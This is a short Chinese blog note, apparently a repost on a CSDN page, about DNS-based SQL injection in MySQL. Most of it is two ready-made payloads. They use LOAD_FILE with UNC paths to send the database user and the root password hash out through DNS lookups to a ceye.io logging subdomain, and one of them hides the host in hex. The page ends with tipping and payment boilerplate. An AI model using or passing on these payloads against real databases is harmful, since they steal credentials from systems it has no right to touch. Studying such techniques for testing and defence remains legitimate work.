小结--dns注入

0x01 杂言

最近实在是太忙了,考试都排满了,晚上刚考完,补一下昨天的东西,写一下dns注入。
我们知道在盲注的时候,要用脚本去跑,在测试的时候效率就不是很高,这时候用dns注入往往事半功倍

0x02 payload

这里直接贴一下payload

LOAD_FILE(CONCAT(0x5C5C,(HEX(USER())),0x2E3563733076642E636579652E696F5C313233))

下面这个是没有引号的
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.[图片]mysql.ip.port.xxxx.ceye.io\\abc'));

这里上面的地址可以用ceye.io这个网站去看dns的解析记录

转载于:https://www.cnblogs.com/spark-xl/p/9094674.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值